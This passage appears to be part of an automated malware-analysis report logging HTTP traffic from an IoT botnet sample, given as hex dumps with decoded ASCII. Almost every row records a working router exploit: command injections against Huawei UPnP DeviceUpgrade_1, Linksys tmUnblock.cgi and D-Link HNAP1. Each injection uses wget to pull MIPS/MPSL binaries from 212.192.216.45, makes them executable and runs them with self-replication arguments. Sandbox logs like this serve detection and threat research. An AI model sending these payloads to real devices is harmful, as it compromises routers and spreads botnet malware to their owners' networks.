55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 